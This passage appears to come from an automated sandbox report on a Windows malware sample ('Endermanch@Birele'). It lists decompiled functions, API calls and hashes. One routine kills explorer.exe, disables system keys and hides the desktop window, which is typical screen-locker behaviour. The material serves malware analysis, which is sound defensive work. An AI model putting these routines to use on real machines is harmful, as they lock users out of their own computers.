                                                                                                                                                  				E004073D6( *((intOrPtr*)(_t113 + 0x5c)), _t110, _t113); // executed
                                                                                                                                                  				_t44 =  *(_t110 + 4) & 0x0000ffff;
                                                                                                                                                  				if(_t44 != 0x10) {
                                                                                                                                                  					__eflags = _t44 - 2;
                                                                                                                                                  					if(_t44 != 2) {
                                                                                                                                                  						__eflags = _t44 - 0x82;
                                                                                                                                                  						if(_t44 != 0x82) {
                                                                                                                                                  							__eflags = _t44 - 5;
                                                                                                                                                  							if(_t44 != 5) {
                                                                                                                                                  								__eflags = _t44 - 0x112;
                                                                                                                                                  								if(_t44 != 0x112) {
                                                                                                                                                  									__eflags = _t44 - 7;
                                                                                                                                                  									if(_t44 != 7) {
                                                                                                                                                  										__eflags = _t44 - 0x132 - 6;
                                                                                                                                                  										if(_t44 - 0x132 > 6) {
                                                                                                                                                  											__eflags = _t44 - 0x111;
                                                                                                                                                  											if(_t44 != 0x111) {
                                                                                                                                                  												__eflags = _t44 - 0x100 - 8;
                                                                                                                                                  												if(_t44 - 0x100 > 8) {
                                                                                                                                                  													L41:
                                                                                                                                                  													_t46 = E004078A0(_t113, _t110);
                                                                                                                                                  													L46:
                                                                                                                                                  													return _t46;
                                                                                                                                                  												}
                                                                                                                                                  												_t47 = GetFocus();
                                                                                                                                                  												__eflags = _t47 -  *(_t113 + 0x1c);
                                                                                                                                                  												if(_t47 !=  *(_t113 + 0x1c)) {
                                                                                                                                                  													L42:
                                                                                                                                                  													_t48 = 0;
                                                                                                                                                  													__eflags = 0;
                                                                                                                                                  													L43:
                                                                                                                                                  													_push(_t48);
                                                                                                                                                  													__eflags =  *0x4198a5;
                                                                                                                                                  													if( *0x4198a5 == 0) {
                                                                                                                                                  														 *_t116();
                                                                                                                                                  													}
                                                                                                                                                  													L45:
                                                                                                                                                  													_pop(_t46);
                                                                                                                                                  													goto L46;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags =  *0x4181a8(_t47);
                                                                                                                                                  												if(__eflags == 0) {
                                                                                                                                                  													__eflags =  *((intOrPtr*)(_t113 + 0x64))();
                                                                                                                                                  												}
                                                                                                                                                  												_pop(_t48);
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													goto L43;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t53 = GetKeyState(0x11);
                                                                                                                                                  													_t55 = GetKeyState(0x12);
                                                                                                                                                  													__eflags = _t55 | _t53;
                                                                                                                                                  													if((_t55 | _t53) < 0) {
                                                                                                                                                  														goto L41;
                                                                                                                                                  													}
                                                                                                                                                  													__eflags =  *(_t110 + 4) - 0x102;
                                                                                                                                                  													if( *(_t110 + 4) != 0x102) {
                                                                                                                                                  														_t58 = E00407CF4(_t113);
                                                                                                                                                  														__eflags = _t58;
                                                                                                                                                  														if(_t58 == 0) {
                                                                                                                                                  															goto L41;
                                                                                                                                                  														}
                                                                                                                                                  														 *(_t110 + 4) - 0x100 =  *(_t110 + 4) - 0x104;
                                                                                                                                                  														_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x70))))();
                                                                                                                                                  														__eflags = _t60;
                                                                                                                                                  														if(_t60 == 0) {
                                                                                                                                                  															goto L41;
                                                                                                                                                  														}
                                                                                                                                                  														L40:
                                                                                                                                                  														_t48 = 0;
                                                                                                                                                  														 *(_t110 + 8) = 0;
                                                                                                                                                  														goto L43;
                                                                                                                                                  													}
                                                                                                                                                  													__eflags =  *(_t110 + 8) - 9;
                                                                                                                                                  													if( *(_t110 + 8) == 9) {
                                                                                                                                                  														goto L40;
                                                                                                                                                  													}
                                                                                                                                                  													goto L41;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											_t63 = GetWindowLongA( *(_t110 + 0xc), 0xffffffeb);
                                                                                                                                                  											__eflags = _t63;
                                                                                                                                                  											if(_t63 == 0) {
                                                                                                                                                  												goto L41;
                                                                                                                                                  											}
                                                                                                                                                  											_t48 = SendMessageA( *(_t110 + 0xc), 0xb005,  *(_t110 + 8),  *(_t110 + 0xc));
                                                                                                                                                  											goto L43;
                                                                                                                                                  										}
                                                                                                                                                  										_t48 = SendMessageA( *(_t110 + 0xc), _t44 + 0xbc00,  *(_t110 + 8),  *(_t110 + 0xc));
                                                                                                                                                  										goto L43;
                                                                                                                                                  									}
                                                                                                                                                  									_t66 = E004078C0(_t113);
                                                                                                                                                  									__eflags = _t66;
                                                                                                                                                  									if(_t66 == 0) {
                                                                                                                                                  										goto L42;
                                                                                                                                                  									}
                                                                                                                                                  									 *((char*)(_t113 + 0x12a)) =  *((char*)(_t113 + 0x12a)) + 1;
                                                                                                                                                  									_t46 = E004078A0(_t113, _t110);
                                                                                                                                                  									 *((char*)(_t113 + 0x12a)) =  *((char*)(_t113 + 0x12a)) - 1;
                                                                                                                                                  									goto L46;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = ( *(_t110 + 8) & 0x000000f0) - 0xf020;
                                                                                                                                                  								if(( *(_t110 + 8) & 0x000000f0) != 0xf020) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								_t71 = E004078F8(_t113, _t88);
                                                                                                                                                  								__eflags = _t71;
                                                                                                                                                  								if(_t71 == 0) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t113 -  *0x4198a8; // 0x2170a88
                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								_t72 =  *0x4198a8; // 0x2170a88
                                                                                                                                                  								_t11 = _t72 + 0x1c; // 0x5001a
                                                                                                                                                  								PostMessageA( *_t11, 0x112, 0xf020, 0);
                                                                                                                                                  								goto L42;
                                                                                                                                                  							}
                                                                                                                                                  							 *0x418104(E004078A0(_t113, _t110));
                                                                                                                                                  							goto L45;
                                                                                                                                                  						}
                                                                                                                                                  						SetWindowLongA( *(_t113 + 0x1c), 0xffffffeb, 0);
                                                                                                                                                  						_t46 = 0;
                                                                                                                                                  						goto L46;
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t113 + 0x35) =  *(_t113 + 0x35) | 0x00000010;
                                                                                                                                                  					goto L41;
                                                                                                                                                  				}
                                                                                                                                                  				_t124 = _t113 -  *0x4198a8; // 0x2170a88
                                                                                                                                                  				if(_t124 == 0 || E004078F8(_t113, _t88) != 0) {
                                                                                                                                                  					PostQuitMessage(0);
                                                                                                                                                  					 *0x4198a5 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				goto L41;
                                                                                                                                                  			}

























                                                                                                                                                  0x00407330
                                                                                                                                                  0x00407331
                                                                                                                                                  0x00407333
                                                                                                                                                  0x0040733a
                                                                                                                                                  0x00407343
                                                                                                                                                  0x00407343
                                                                                                                                                  0x00407348
                                                                                                                                                  0x0040734e
                                                                                                                                                  0x00407350
                                                                                                                                                  0x00407356
                                                                                                                                                  0x0040735a
                                                                                                                                                  0x0040735c
                                                                                                                                                  0x0040735c
                                                                                                                                                  0x0040735a
                                                                                                                                                  0x00407361
                                                                                                                                                  0x00407363
                                                                                                                                                  0x0040736d
                                                                                                                                                  0x00407372
                                                                                                                                                  0x0040737a
                                                                                                                                                  0x004073a6
                                                                                                                                                  0x004073aa
                                                                                                                                                  0x004073b5
                                                                                                                                                  0x004073b9
                                                                                                                                                  0x004073ed
                                                                                                                                                  0x004073f1
                                                                                                                                                  0x0040740a
                                                                                                                                                  0x0040740e
                                                                                                                                                  0x00407459
                                                                                                                                                  0x0040745d
                                                                                                                                                  0x0040748f
                                                                                                                                                  0x00407493
                                                                                                                                                  0x004074ad
                                                                                                                                                  0x004074b1
                                                                                                                                                  0x004074e4
                                                                                                                                                  0x004074e8
                                                                                                                                                  0x00407576
                                                                                                                                                  0x0040757a
                                                                                                                                                  0x00407596
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407599
                                                                                                                                                  0x004074ee
                                                                                                                                                  0x004074f3
                                                                                                                                                  0x004074f6
                                                                                                                                                  0x00407581
                                                                                                                                                  0x00407581
                                                                                                                                                  0x00407581
                                                                                                                                                  0x00407583
                                                                                                                                                  0x00407583
                                                                                                                                                  0x00407584
                                                                                                                                                  0x0040758b
                                                                                                                                                  0x00407593
                                                                                                                                                  0x00407593
                                                                                                                                                  0x00407595
                                                                                                                                                  0x00407595
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407595
                                                                                                                                                  0x00407509
                                                                                                                                                  0x0040750b
                                                                                                                                                  0x00407516
                                                                                                                                                  0x00407516
                                                                                                                                                  0x00407518
                                                                                                                                                  0x00407519
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040751b
                                                                                                                                                  0x0040751d
                                                                                                                                                  0x00407525
                                                                                                                                                  0x0040752a
                                                                                                                                                  0x0040752c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040752e
                                                                                                                                                  0x00407534
                                                                                                                                                  0x00407540
                                                                                                                                                  0x00407545
                                                                                                                                                  0x00407547
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407558
                                                                                                                                                  0x00407569
                                                                                                                                                  0x0040756b
                                                                                                                                                  0x0040756d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040756f
                                                                                                                                                  0x0040756f
                                                                                                                                                  0x00407571
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407571
                                                                                                                                                  0x00407536
                                                                                                                                                  0x0040753a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040753c
                                                                                                                                                  0x00407519
                                                                                                                                                  0x004074b8
                                                                                                                                                  0x004074bd
                                                                                                                                                  0x004074bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004074d3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004074d3
                                                                                                                                                  0x004074a3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004074a3
                                                                                                                                                  0x00407461
                                                                                                                                                  0x00407466
                                                                                                                                                  0x00407468
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040746e
                                                                                                                                                  0x00407478
                                                                                                                                                  0x0040747d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040747d
                                                                                                                                                  0x00407415
                                                                                                                                                  0x00407419
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407421
                                                                                                                                                  0x00407426
                                                                                                                                                  0x00407428
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040742e
                                                                                                                                                  0x00407434
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407446
                                                                                                                                                  0x0040744c
                                                                                                                                                  0x0040744f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040744f
                                                                                                                                                  0x004073ff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004073ff
                                                                                                                                                  0x004073c2
                                                                                                                                                  0x004073c7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004073c7
                                                                                                                                                  0x004073ac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004073ac
                                                                                                                                                  0x0040737c
                                                                                                                                                  0x00407382
                                                                                                                                                  0x00407395
                                                                                                                                                  0x0040739a
                                                                                                                                                  0x0040739a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00407395
                                                                                                                                                  • SetWindowLongA.USER32(?,000000EB,00000000), ref: 004073C2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongMessagePostQuitWindow
                                                                                                                                                  • String ID: 8a@$D\@
                                                                                                                                                  • API String ID: 2279192769-2779446848
                                                                                                                                                  • Opcode ID: e8f9b52dbe87dbd2a03ac0c41f9de3099c748b6ecdaf35970de2d348b1ea4bef
                                                                                                                                                  • Instruction ID: 4b44cfad1e402995f628ba2f6b58cd16b1fa440a91150112cc6024f5e216e72f
                                                                                                                                                  • Opcode Fuzzy Hash: e8f9b52dbe87dbd2a03ac0c41f9de3099c748b6ecdaf35970de2d348b1ea4bef
                                                                                                                                                  • Instruction Fuzzy Hash: 9B519030F18A01BBEA2167299C41EEA7792EB04714F50C53BE841B6AD2C77CBC52D65F
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 97 408410-408415 98 408421-408424 97->98 99 408417-40841f call 4083e0 97->99 101 408426-40842c 98->101 102 40844b-4084b4 LoadCursorA call 4086a4 call 405f88 call 405be0 call 407aa8 98->102 99->98 108 408449-40844a 99->108 105 408442 call 406250 101->105 106 40842e-408440 call 406250 call 4076a4 101->106 121 4084b6 102->121 122 4084b8-4084c5 102->122 113 408447 105->113 106->113 113->108 121->122 123 4084c7 122->123 124 4084c9-4084d4 122->124 123->124 125 4084d6-4084da 124->125 126 4084df-4084f8 124->126 125->126 129 4084dc-4084de 125->129 127 4084fa-408516 GetClassInfoA 126->127 128 40851e-408522 126->128 127->128 130 408524-408528 128->130 131 40852b-408531 128->131 129->126 130->131 132 408533-408539 131->132 133 40853f-40855a GetClassInfoA 131->133 132->133 134 4085f8-4085fc 132->134 135 40855c-40857b RegisterClassA 133->135 136 40857d-40858d CreateWindowExA 133->136 135->134 135->136 136->134 137 40858f-4085ad SendMessageA GetWindowLongA 136->137 138 4085be-4085c2 137->138 139 4085af-4085b9 SetWindowLongA 137->139 140 4085c4-4085d4 call 40784c call 40802c 138->140 141 4085d9-4085f6 call 406250 138->141 139->138 140->141 141->134
                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                  			E00408410(void* __eax) {
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  
                                                                                                                                                  				_t21 = __eax;
                                                                                                                                                  				asm("jecxz 0xc");
                                                                                                                                                  				_t13 = E004083E0( *((intOrPtr*)(__eax + 0x30)));
                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                  					asm("jecxz 0x27");
                                                                                                                                                  					_t14 = _t21;
                                                                                                                                                  					if(( *(_t21 + 0x37) & 0x00000001) == 0) {
                                                                                                                                                  						E00406250(_t14);
                                                                                                                                                  					} else {
                                                                                                                                                  						E00406250(_t14);
                                                                                                                                                  						E004076A4(_t21, 1);
                                                                                                                                                  						 *(_t21 + 0x37) =  *(_t21 + 0x37) & 0x000000fe;
                                                                                                                                                  					}
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}






                                                                                                                                                  0x00408411
                                                                                                                                                  0x00408415
                                                                                                                                                  0x00408418
                                                                                                                                                  0x0040841f
                                                                                                                                                  0x00408424
                                                                                                                                                  0x00408426
                                                                                                                                                  0x0040842c
                                                                                                                                                  0x00408442
                                                                                                                                                  0x0040842e
                                                                                                                                                  0x0040842e
                                                                                                                                                  0x00408437
                                                                                                                                                  0x0040843c
                                                                                                                                                  0x0040843c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408447
                                                                                                                                                  0x0040844a

                                                                                                                                                  APIs
                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00408457
                                                                                                                                                  • GetClassInfoA.USER32(?,?,?), ref: 00408506
                                                                                                                                                  • GetClassInfoA.USER32(?,00000000), ref: 00408550
                                                                                                                                                  • RegisterClassA.USER32(?), ref: 00408574
                                                                                                                                                  • CreateWindowExA.USER32 ref: 00408583
                                                                                                                                                  • SendMessageA.USER32(00000000,00000128,00010002,00000000), ref: 004085A0
                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EB), ref: 004085A5
                                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EB), ref: 004085B9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassWindow$InfoLong$CreateCursorLoadMessageRegisterSend
                                                                                                                                                  • String ID: $@$t}@
                                                                                                                                                  • API String ID: 3716724952-117065541
                                                                                                                                                  • Opcode ID: 7f59b022afe71f7c988d21a53f77d0bb3c0a79b97eb6ce6c36e5b3fedb748f7d
                                                                                                                                                  • Instruction ID: 9368d8d94cc0d850d94797ff8fce3b87ae9df95c5df590054d80d2d2ded8e029
                                                                                                                                                  • Opcode Fuzzy Hash: 7f59b022afe71f7c988d21a53f77d0bb3c0a79b97eb6ce6c36e5b3fedb748f7d
                                                                                                                                                  • Instruction Fuzzy Hash: 3D5192702042016BDB14AF69CD86F6B3698EB44318F04457EFD85EA2D7DF79EC018B29
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 334 401978-40199a RtlInitializeCriticalSection 335 4019a6-4019dc call 40133c * 3 LocalAlloc 334->335 336 40199c-4019a1 RtlEnterCriticalSection 334->336 343 401a0d-401a21 335->343 344 4019de 335->344 336->335 348 401a23-401a28 RtlLeaveCriticalSection 343->348 349 401a2d 343->349 345 4019e3-4019f5 344->345 345->345 347 4019f7-401a06 345->347 347->343 348->349
                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E00401978() {
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				signed int _t13;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  
                                                                                                                                                  				_push(_t23);
                                                                                                                                                  				_push(E00401A2E);
                                                                                                                                                  				_push( *[fs:edx]);
                                                                                                                                                  				 *[fs:edx] = _t23;
                                                                                                                                                  				_push(0x4195c4);
                                                                                                                                                  				L004012CC();
                                                                                                                                                  				if( *0x419045 != 0) {
                                                                                                                                                  					_push(0x4195c4);
                                                                                                                                                  					L004012D4();
                                                                                                                                                  				}
                                                                                                                                                  				E0040133C(0x4195e4);
                                                                                                                                                  				E0040133C(0x4195f4);
                                                                                                                                                  				E0040133C(0x419620);
                                                                                                                                                  				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                                                                  				 *0x41961c = _t11;
                                                                                                                                                  				if( *0x41961c != 0) {
                                                                                                                                                  					_t13 = 3;
                                                                                                                                                  					do {
                                                                                                                                                  						_t20 =  *0x41961c; // 0x641848
                                                                                                                                                  						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                                                  						_t13 = _t13 + 1;
                                                                                                                                                  					} while (_t13 != 0x401);
                                                                                                                                                  					 *((intOrPtr*)(0x419608)) = 0x419604;
                                                                                                                                                  					 *0x419604 = 0x419604;
                                                                                                                                                  					 *0x419610 = 0x419604;
                                                                                                                                                  					 *0x4195bc = 1;
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t19);
                                                                                                                                                  				 *[fs:eax] = _t19;
                                                                                                                                                  				_push(E00401A35);
                                                                                                                                                  				if( *0x419045 != 0) {
                                                                                                                                                  					_push(0x4195c4);
                                                                                                                                                  					L004012DC();
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}








                                                                                                                                                  0x0040197d
                                                                                                                                                  0x0040197e
                                                                                                                                                  0x00401983
                                                                                                                                                  0x00401986
                                                                                                                                                  0x00401989
                                                                                                                                                  0x0040198e
                                                                                                                                                  0x0040199a
                                                                                                                                                  0x0040199c
                                                                                                                                                  0x004019a1
                                                                                                                                                  0x004019a1
                                                                                                                                                  0x004019ab
                                                                                                                                                  0x004019b5
                                                                                                                                                  0x004019bf
                                                                                                                                                  0x004019cb
                                                                                                                                                  0x004019d0
                                                                                                                                                  0x004019dc
                                                                                                                                                  0x004019de
                                                                                                                                                  0x004019e3
                                                                                                                                                  0x004019e3
                                                                                                                                                  0x004019eb
                                                                                                                                                  0x004019ef
                                                                                                                                                  0x004019f0
                                                                                                                                                  0x004019fc
                                                                                                                                                  0x004019ff
                                                                                                                                                  0x00401a01
                                                                                                                                                  0x00401a06
                                                                                                                                                  0x00401a06
                                                                                                                                                  0x00401a0f
                                                                                                                                                  0x00401a12
                                                                                                                                                  0x00401a15
                                                                                                                                                  0x00401a21
                                                                                                                                                  0x00401a23
                                                                                                                                                  0x00401a28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401a28
                                                                                                                                                  0x00401a2d

                                                                                                                                                  APIs
                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL(004195C4), ref: 0040198E
                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(004195C4), ref: 004019A1
                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401A2E), ref: 004019CB
                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(004195C4), ref: 00401A28
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                  • String ID: \.d$l.d$|.d
                                                                                                                                                  • API String ID: 730355536-442885890
                                                                                                                                                  • Opcode ID: 72bcf1658e0dbe427098996c7a5a3787cfcb7b4ae65ee31cc13865eff46c6b24
                                                                                                                                                  • Instruction ID: d60cc9ef39ec4d425318bd1b2011f8c13954cbab7dd47cd24b1532178e821ca6
                                                                                                                                                  • Opcode Fuzzy Hash: 72bcf1658e0dbe427098996c7a5a3787cfcb7b4ae65ee31cc13865eff46c6b24
                                                                                                                                                  • Instruction Fuzzy Hash: 71016DB4A042416EE716AF6AD826B997AD5D749B04F04C07FE000B66F2C6BD4C81CB6D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 350 416f28-416f36 FindWindowA 351 416f44-416f52 FindWindowA 350->351 352 416f38-416f3f PostMessageA 350->352 354 416f60-416f6e FindWindowA 351->354 355 416f54-416f5b PostMessageA 351->355 352->351 357 416f70-416f77 PostMessageA 354->357 358 416f7c-416f8a FindWindowA 354->358 355->354 357->358 361 416f98 358->361 362 416f8c-416f93 PostMessageA 358->362 362->361
                                                                                                                                                  APIs
                                                                                                                                                  • FindWindowA.USER32(00000000,00416F9C), ref: 00416F2F
                                                                                                                                                  • PostMessageA.USER32 ref: 00416F3F
                                                                                                                                                  • FindWindowA.USER32(00000000,00416FB4), ref: 00416F4B
                                                                                                                                                  • PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F5B
                                                                                                                                                  • FindWindowA.USER32 ref: 00416F67
                                                                                                                                                  • PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F77
                                                                                                                                                  • FindWindowA.USER32(00000000,00416FD8), ref: 00416F83
                                                                                                                                                  • PostMessageA.USER32(00000000,00000012,00000001,00000000), ref: 00416F93
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FindMessagePostWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2578315405-0
                                                                                                                                                  • Opcode ID: 0bb68e452afd02f952d073098c530cdf86de51be71a44cf78ace5e8528899316
                                                                                                                                                  • Instruction ID: 661fba5b01d46d0b46c1ef70e0b7278d8788cecdbc256bcfcd4e32d11ee09805
                                                                                                                                                  • Opcode Fuzzy Hash: 0bb68e452afd02f952d073098c530cdf86de51be71a44cf78ace5e8528899316
                                                                                                                                                  • Instruction Fuzzy Hash: 14F09234BC8B1434F82036721E43F9B18288B04F09F6204267B14BD1C3C5EDF881141D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E00416E5C(void* __eax, void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				struct HWND__* _t14;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				intOrPtr _t34;
                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  
                                                                                                                                                  				_t39 = __eflags;
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_t27 = __eax;
                                                                                                                                                  				_push(_t38);
                                                                                                                                                  				_push(0x416eed);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t38;
                                                                                                                                                  				WinExec("taskkill /F /IM explorer.exe", 0); // executed
                                                                                                                                                  				E00416BE8(_t27, __esi, _t39); // executed
                                                                                                                                                  				E00416CD4(_t27, __esi, _t39); // executed
                                                                                                                                                  				E00416AF0(1, _t39); // executed
                                                                                                                                                  				SystemParametersInfoA(0x61, 1, 0, 0);
                                                                                                                                                  				_t14 = FindWindowA(0, "Program Manager"); // executed
                                                                                                                                                  				ShowWindow(_t14, 0); // executed
                                                                                                                                                  				E00402800();
                                                                                                                                                  				E004086D8( *((intOrPtr*)(_t27 + 0x48)),  &_v8, E00402910(5));
                                                                                                                                                  				E0040766C( *((intOrPtr*)(_t27 + 0x2c)), _v8);
                                                                                                                                                  				_pop(_t34);
                                                                                                                                                  				 *[fs:eax] = _t34;
                                                                                                                                                  				_push(E00416EF4);
                                                                                                                                                  				return E004039AC( &_v8);
                                                                                                                                                  			}









                                                                                                                                                  0x00416e5c
                                                                                                                                                  0x00416e5f
                                                                                                                                                  0x00416e62
                                                                                                                                                  0x00416e66
                                                                                                                                                  0x00416e67
                                                                                                                                                  0x00416e6c
                                                                                                                                                  0x00416e6f
                                                                                                                                                  0x00416e79
                                                                                                                                                  0x00416e7e
                                                                                                                                                  0x00416e83
                                                                                                                                                  0x00416e8a
                                                                                                                                                  0x00416e97
                                                                                                                                                  0x00416ea5
                                                                                                                                                  0x00416eab
                                                                                                                                                  0x00416eb0
                                                                                                                                                  0x00416ec7
                                                                                                                                                  0x00416ed2
                                                                                                                                                  0x00416ed9
                                                                                                                                                  0x00416edc
                                                                                                                                                  0x00416edf
                                                                                                                                                  0x00416eec

                                                                                                                                                  APIs
                                                                                                                                                  • WinExec.KERNEL32(taskkill /F /IM explorer.exe,00000000), ref: 00416E79
                                                                                                                                                  • SystemParametersInfoA.USER32(00000061,00000001,00000000,00000000), ref: 00416E97
                                                                                                                                                  • FindWindowA.USER32(00000000,Program Manager), ref: 00416EA5
                                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00416EED,?,?,00000000), ref: 00416EAB
                                                                                                                                                    • Part of subcall function 00402800: QueryPerformanceCounter.KERNEL32 ref: 00402804
                                                                                                                                                    • Part of subcall function 0040766C: SendMessageA.USER32(?,0000000C,00000000,?), ref: 00407689
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
